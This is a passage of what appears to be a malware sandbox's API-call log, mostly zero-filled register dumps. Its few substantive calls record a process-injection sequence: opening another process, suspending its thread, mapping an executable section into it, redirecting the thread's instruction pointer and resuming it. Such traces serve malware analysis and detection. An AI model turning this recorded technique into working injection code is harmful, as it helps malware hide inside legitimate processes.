[7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.561] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.561] NtClose (Handle=0x1a0) returned 0x0 [0140.561] NtClose (Handle=0x1a4) returned 0x0 [0140.562] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11ec, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0140.562] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.562] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.562] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x22f000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.563] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.576] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11f0) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0140.576] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.576] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2260000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.595] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x22f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.598] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.598] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x111200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x112000) returned 0x0 [0140.619] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x111200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x600000, SectionOffset=0x0, ViewSize=0xde6e8*=0x112000) returned 0x0 [0140.639] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0140.644] NtClose (Handle=0x1a8) returned 0x0 [0140.644] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x22f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x67e717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, 